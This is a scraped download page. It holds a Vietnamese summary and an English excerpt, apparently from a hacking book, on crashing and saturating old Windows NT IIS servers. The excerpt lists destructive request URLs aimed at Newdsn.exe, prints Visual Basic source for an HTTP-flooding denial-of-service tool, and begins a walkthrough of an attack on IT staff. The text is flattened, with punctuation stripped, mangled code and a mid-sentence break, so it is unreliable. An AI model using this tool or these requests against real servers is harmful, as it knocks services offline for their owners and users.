Đang chuẩn bị nút TẢI XUỐNG, xin hãy chờ
Tải xuống
Tóm tắt tấn công từ chối-of-Service: WebSite Professional là dễ bị tổn thương đến một cuộc tấn công DoS có thể gây ra tắc nghẽn CPU ngay lập tức, kết quả trong việc gây trở ngại dịch vụ. Hack Nhà nước: tắc nghẽn nghiêm trọng. | Figure 10.9 DoS implications of the telnet hack attack. Figure 10.10 Dr. Watson to the rescue. At this point IIS could immediately crash or crash upon scheduled administrative service interruptions essentially upon administrative shutdown and or service restart. The destructive requests include the following URLs www.victim.com Scripts Tools Newdsn.exe Createdatabase www.victim.com Scripts Tools Newdsn.exe Create Severe Congestion Synopsis Custom HTTP request saturation can cause severe resource degradation. Hack State CPU congestion. 568 Vulnerabilities Win NT 3x 4 and Internet Information Server version 3 4 5. Breach Using a simple underground IIS attack software module see Figure 10.11 that has been programmed for an unlimited hit count a remote attacker can cause severe CPU congestion resulting in resource degradation and ultimately potential service denial. The program shown here was written in Visual Basic and includes only a single form see Figure 10.12 . Figure 10.11 IIS attack via custom HTTP request saturation. Figure 10.12 VB form for Main.frm. 569 main.frm Private Stopper Private Sub Command1_Click On Error GoTo ErrorHandler If Command1.Caption begin Then If IsNumeric Text2.Text False Then MsgBox Please enter a va lid amount vbExclamation Text2.Text 0 Exit Sub Command1.Caption stop Text3.Visible True For a 1 To Text2.Text If Stopper 1 Then Exit Sub Do While Inet1.StillExecuting DoEvents Loop Inet1.Execute Text1.Text GET Text1.Text Text3.Text Text3.Text 1 Next a Else Stopper 1 Command1.Caption begin Text3.Visible False End If Exit Sub ErrorHandler MsgBox Please enter a valid web server vbInformation Exit Sub End Sub System Control The purpose of this section is to re-create a common system control attack on Win NT servers. Attacks like this one against IT staff happen almost everyday. For simplicity this hack is broken into a few effortless steps Step 1 The Search In this step the attacker chooses an IT staff victim. Whether the attacker already knows .
